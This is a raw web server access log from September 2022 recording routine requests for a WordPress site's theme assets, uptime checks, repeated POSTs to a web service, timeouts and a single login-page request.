157.55.39.161 - - [18/Sep/2022:03:35:39 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
157.55.39.161 - - [18/Sep/2022:03:35:39 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
157.55.39.161 - - [18/Sep/2022:03:35:39 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
157.55.39.161 - - [18/Sep/2022:03:35:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
157.55.39.161 - - [18/Sep/2022:03:35:40 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
157.55.39.161 - - [18/Sep/2022:03:35:41 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
216.245.221.92 - - [18/Sep/2022:03:35:41 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.154 - - [18/Sep/2022:03:35:44 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
157.55.39.154 - - [18/Sep/2022:03:35:44 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
157.55.39.154 - - [18/Sep/2022:03:35:45 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
207.46.13.181 - - [18/Sep/2022:03:35:49 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
207.46.13.181 - - [18/Sep/2022:03:35:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
207.46.13.181 - - [18/Sep/2022:03:35:50 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
201.245.192.253 - - [18/Sep/2022:03:36:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:03:35:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:03:36:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
66.249.73.127 - - [18/Sep/2022:03:39:10 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:03:39:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41638
201.245.192.253 - - [18/Sep/2022:03:39:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42444
216.245.221.92 - - [18/Sep/2022:03:40:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:03:41:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [18/Sep/2022:03:41:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:03:42:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
87.250.224.31 - - [18/Sep/2022:03:44:42 -0500] "-" 408 -
66.249.73.127 - - [18/Sep/2022:03:45:17 -0500] "-" 408 -
216.245.221.92 - - [18/Sep/2022:03:45:41 -0500] "HEAD / HTTP/1.1" 200 -
202.95.12.107 - - [18/Sep/2022:03:46:07 -0500] "-" 408 -
201.245.192.253 - - [18/Sep/2022:03:46:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.88 - - [18/Sep/2022:03:46:15 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:47:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Sep/2022:03:47:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
185.119.81.102 - - [18/Sep/2022:03:50:25 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [18/Sep/2022:03:50:26 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [18/Sep/2022:03:50:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Sep/2022:03:51:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [18/Sep/2022:03:51:08 -0500] "-" 408 -
40.77.190.32 - - [18/Sep/2022:03:51:22 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
74.82.47.3 - - [18/Sep/2022:03:52:27 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/Sep/2022:03:54:18 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx HTTP/1.1" 404 1018
172.22.2.4 - - [18/Sep/2022:03:52:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.253.187 - - [18/Sep/2022:03:54:41 -0500] "-" 408 -
172.22.2.4 - - [18/Sep/2022:03:53:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
